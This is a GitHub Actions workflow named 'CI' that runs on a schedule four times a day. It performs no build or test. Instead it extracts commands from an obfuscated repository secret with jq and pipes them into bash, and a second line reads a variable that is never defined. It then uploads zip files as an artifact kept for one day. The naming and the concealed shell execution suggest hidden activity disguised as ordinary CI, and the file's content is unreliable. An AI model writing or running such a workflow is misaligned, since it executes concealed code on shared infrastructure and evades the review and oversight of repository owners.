name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '1 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          qdkr72319: ${{ secrets.qdkr72319 }}
        run: |
          printf '%s' "$qdkr72319" | jq -r .qfgz0533 | /bin/bash
          printf '%s' "$qrog036" | jq -r .bzgct4302 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Lst345fa
          path: "*.zip"
          retention-days: 1
